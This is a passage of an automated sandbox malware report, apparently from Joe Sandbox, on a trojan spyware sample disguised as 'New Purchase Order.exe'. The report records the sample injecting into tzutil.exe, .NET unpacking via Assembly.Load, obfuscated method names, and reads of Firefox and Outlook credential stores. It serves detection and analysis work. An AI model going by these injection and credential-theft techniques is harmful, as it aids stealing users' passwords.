                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C80C008_2_02C80C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C7ADE08_2_02C7ADE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C98DBF8_2_02C98DBF
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C8AD008_2_02C8AD00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D1CD1F8_2_02D1CD1F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C9B2C08_2_02C9B2C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D212ED8_2_02D212ED
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C852A08_2_02C852A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CC739A8_2_02CC739A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C6D34C8_2_02C6D34C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3132D8_2_02D3132D
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C870C08_2_02C870C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D2F0CC8_2_02D2F0CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3F0E08_2_02D3F0E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D370E98_2_02D370E9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C8B1B08_2_02C8B1B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CB516C8_2_02CB516C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C6F1728_2_02C6F172
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D4B16B8_2_02D4B16B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D316CC8_2_02D316CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CC56308_2_02CC5630
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3F7B08_2_02D3F7B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C714608_2_02C71460
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3F43F8_2_02D3F43F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D495C38_2_02D495C3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D1D5B08_2_02D1D5B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D375718_2_02D37571
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D2DAC68_2_02D2DAC6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CC5AA08_2_02CC5AA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D21AA38_2_02D21AA3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D1DAAC8_2_02D1DAAC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D37A468_2_02D37A46
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3FA498_2_02D3FA49
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CF3A6C8_2_02CF3A6C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CBDBF98_2_02CBDBF9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CF5BF08_2_02CF5BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C9FB808_2_02C9FB80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3FB768_2_02D3FB76
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C838E08_2_02C838E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CED8008_2_02CED800
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C899508_2_02C89950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C9B9508_2_02C9B950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D159108_2_02D15910
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C89EB08_2_02C89EB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C81F928_2_02C81F92
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3FFB18_2_02D3FFB1
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3FF098_2_02D3FF09
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D3FCF28_2_02D3FCF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02CF9C328_2_02CF9C32
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C9FDC08_2_02C9FDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C83D408_2_02C83D40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D31D5A8_2_02D31D5A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D37D738_2_02D37D73
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001D21308_2_001D2130
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001CD0508_2_001CD050
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001CD0488_2_001CD048
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001CD2708_2_001CD270
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001CB2908_2_001CB290
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001CB3E08_2_001CB3E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001D57F08_2_001D57F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001D39FB8_2_001D39FB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001D3A008_2_001D3A00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001EBD508_2_001EBD50
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02AEE4268_2_02AEE426
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02AEE5448_2_02AEE544
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02AEE8DC8_2_02AEE8DC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02AED9A88_2_02AED9A8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02AECC488_2_02AECC48
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 018CF290 appears 105 times
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 01885130 appears 58 times
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 018BEA12 appears 86 times
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 0183B970 appears 280 times
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 01897E54 appears 107 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 02C6B970 appears 280 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 02CFF290 appears 105 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 02CB5130 appears 58 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 02CC7E54 appears 110 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 02CEEA12 appears 86 times
                Source: New Purchase Order.exe, 00000000.00000000.1351468701.0000000000504000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelSvH.exe0 vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1398507379.00000000041D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1400933010.0000000007690000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1396835534.0000000000ACE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1397890145.00000000029D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1401868692.0000000009550000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000003.00000002.1939972937.00000000013D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000003.00000002.1940402066.000000000193D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000003.00000002.1939972937.00000000013B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs New Purchase Order.exe
                Source: New Purchase Order.exeBinary or memory string: OriginalFilenamelSvH.exe0 vs New Purchase Order.exe
                Source: New Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, qJLvinebBxISnykLbR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, qJLvinebBxISnykLbR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, x9KwdfT83fQ1H75NjQ.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, x9KwdfT83fQ1H75NjQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, x9KwdfT83fQ1H75NjQ.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, x9KwdfT83fQ1H75NjQ.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, x9KwdfT83fQ1H75NjQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, x9KwdfT83fQ1H75NjQ.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, qJLvinebBxISnykLbR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, x9KwdfT83fQ1H75NjQ.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, x9KwdfT83fQ1H75NjQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, x9KwdfT83fQ1H75NjQ.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@5/3
                Source: C:\Users\user\Desktop\New Purchase Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Purchase Order.exe.logJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\tzutil.exeFile created: C:\Users\user\AppData\Local\Temp\UQ63g7r-Jump to behavior
                Source: New Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: New Purchase Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: tzutil.exe, 00000008.00000002.2611141533.000000000289A000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2611141533.000000000286A000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2611141533.0000000002848000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2131325423.000000000286A000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2611141533.0000000002876000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: New Purchase Order.exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: New Purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: New Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tzutil.pdbGCTL source: New Purchase Order.exe, 00000003.00000002.1939972937.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611092147.0000000000D17000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: snpURZzZKgO.exe, 00000005.00000002.2610064445.00000000002DE000.00000002.00000001.01000000.0000000C.sdmp, snpURZzZKgO.exe, 00000009.00000002.2610993422.00000000002DE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1940041347.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1946811053.0000000002A94000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000008.00000003.1940041347.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.1946811053.0000000002A94000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: New Purchase Order.exe, 00000003.00000002.1939972937.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, snpURZzZKgO.exe, 00000005.00000002.2611092147.0000000000D17000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, x9KwdfT83fQ1H75NjQ.cs.Net Code: tZlGWcgwd3 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.41f1d80.0.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, x9KwdfT83fQ1H75NjQ.cs.Net Code: tZlGWcgwd3 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.7690000.4.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, x9KwdfT83fQ1H75NjQ.cs.Net Code: tZlGWcgwd3 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 0_2_04DB1D80 pushfd ; iretd 0_2_04DB1D81
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_004031D0 push eax; ret 3_2_004031D2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_004169E7 push 0F6CFD2Bh; ret 3_2_00416A18
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00423A0A push esp; ret 3_2_00423A0D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00419359 push ds; ret 3_2_0041935B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00418366 pushad ; iretd 3_2_00418367
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00408325 push dword ptr [ebx+5Dh]; ret 3_2_0040830B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00417388 push edi; ret 3_2_0041738D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00419477 push edx; ret 3_2_00419485
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00408403 push 00000074h; iretd 3_2_0040840B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00417411 push eax; ret 3_2_00417414
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00411D6F push ds; iretd 3_2_00411DBD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00411D7B push ds; iretd 3_2_00411DBD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0041758A push ebp; ret 3_2_004175A6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0040D66A push ecx; iretd 3_2_0040D6D9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00414E05 push cs; retf 3_2_00414E14
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0040860D push cs; retf 3_2_0040860E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00413E93 pushfd ; ret 3_2_00413F00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_00413EBC pushfd ; ret 3_2_00413F00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018409AD push ecx; mov dword ptr [esp], ecx3_2_018409B6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C709AD push ecx; mov dword ptr [esp], ecx8_2_02C709B6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02C41366 push eax; iretd 8_2_02C41369
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001D6186 push ds; ret 8_2_001D6188
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001D41B5 push edi; ret 8_2_001D41BA
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001D423E push eax; ret 8_2_001D4241
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001D62A4 push edx; ret 8_2_001D62B2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001D43B7 push ebp; ret 8_2_001D43D3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001D2817 push ebp; iretd 8_2_001D2818
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001E0834 push esp; ret 8_2_001E083A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001E0840 push esp; ret 8_2_001E083A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_001E0840 push ebp; retn 2F48h8_2_001E0927
                Source: New Purchase Order.exeStatic PE information: section name: .text entropy: 7.774994729207274
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, Mw4V8KhpS2G0JUgxuV.csHigh entropy of concatenated method names: 'ToString', 'B4vIjhU2Tw', 'M1lI8gGtPA', 'hGFI3vGNvE', 'kuKIUc1EQc', 'T7sIZSPYda', 'c9mIM4WuYW', 'MTPIsi8ImO', 'gogIfnkWQH', 'SCbIOcLTgQ'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, UnLOGLACcMYAxbpnNq.csHigh entropy of concatenated method names: 'QbBvip4nnG', 'upSv848CRA', 'PYhv3HgH7L', 'YgUvULcaqx', 'JDCvZZYllk', 'GJIvMpqmw1', 'QpqvsTFPhr', 'ImWvfZBqAa', 'IOQvOj6e8Y', 'sIbvJrBTOi'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, ID9eoKYmHSYY79KjaI.csHigh entropy of concatenated method names: 'G43760uKNA', 'tWj7KLqmpo', 'jx3xoMmZVa', 'IaUxmSHhIM', 'R8W7jmkQrG', 'NXK7uWFCiK', 'k6g7lxXho5', 'gBa7PSq3rx', 'XtW7SvR86c', 'BEC7kKrMVK'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, btCpwG6WZyE3ZX17TX.csHigh entropy of concatenated method names: 'qnetdWQFE6', 'uO2t42KETm', 'K6lC3Mw4mK', 'oipCUhY45O', 'uVHCZucxXY', 'y3HCM55vIb', 'sbyCsAR4eu', 'prCCfokx9x', 'Vq8COyiAKx', 'AISCJCYJlK'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, r0yIrBonvq7nvwCEQV.csHigh entropy of concatenated method names: 'WQ7mL2uN5L', 'Wt9mgjG6Mq', 'SZUmBiIY8h', 'vidmeeLXWi', 'JkwmDwhYT7', 'kwumI8H51o', 'jDM30GIHFDfChaMpE0', 'W4kwpOQNpXSEW6pvqF', 'uXWmmX7DRW', 'uVHmFeAsYy'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, z8j2I5NvfYZF22kkA5q.csHigh entropy of concatenated method names: 't91bKnroPG', 'QwAbz02UR6', 'QIpcoIVGRL', 'Oe2alnZ3xiJk6cu3LDT', 'rJ5puAZ4W04I3nieLuy', 'tlCONxZMhGtpI8hgTmR', 'aBSgLsZ04jx4VCWE0dM'
